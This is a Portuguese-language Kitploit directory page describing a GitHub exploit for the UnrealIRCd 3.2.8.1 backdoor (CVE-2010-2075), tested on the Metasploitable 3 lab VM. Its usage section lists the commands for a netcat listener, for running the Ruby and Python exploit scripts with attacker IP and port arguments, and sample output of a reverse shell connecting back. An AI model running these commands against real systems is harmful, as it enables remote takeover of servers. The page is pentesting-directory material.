Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
unrealircd3.2.8.1-local-exploit — Exploit em Ruby e Python para CVE-2010-2075 direcionado ao UnrealIRCd 3.2.8.1, fornecendo acesso remoto a reverse shell no Metasploitable 3. | Kitploit
Ferramentas/GitHubGitHub/earthbendergara/unrealircd3.2.8.1-local-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubearthbendergara/unrealircd3.2.8.1-local-exploit

unrealircd3.2.8.1-local-exploit

Exploit em Ruby e Python para CVE-2010-2075 direcionado ao UnrealIRCd 3.2.8.1, fornecendo acesso remoto a reverse shell no Metasploitable 3.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
13há 9 mesesAinda não revisado
Compartilhar

Testado no Metasploitable 3

USO

Ruby

No shell do atacante

root@kitploit:~
nc -nlvp 1111

No shell da vítima

root@kitploit:~
ruby exploit.rb 127.0.0.1

Saída esperada no shell do atacante

root@kitploit:~
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett

Python

No shell da vítima

root@kitploit:~
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>

No shell do atacante

root@kitploit:~
nc -nlvp 1111
Baixar ferramenta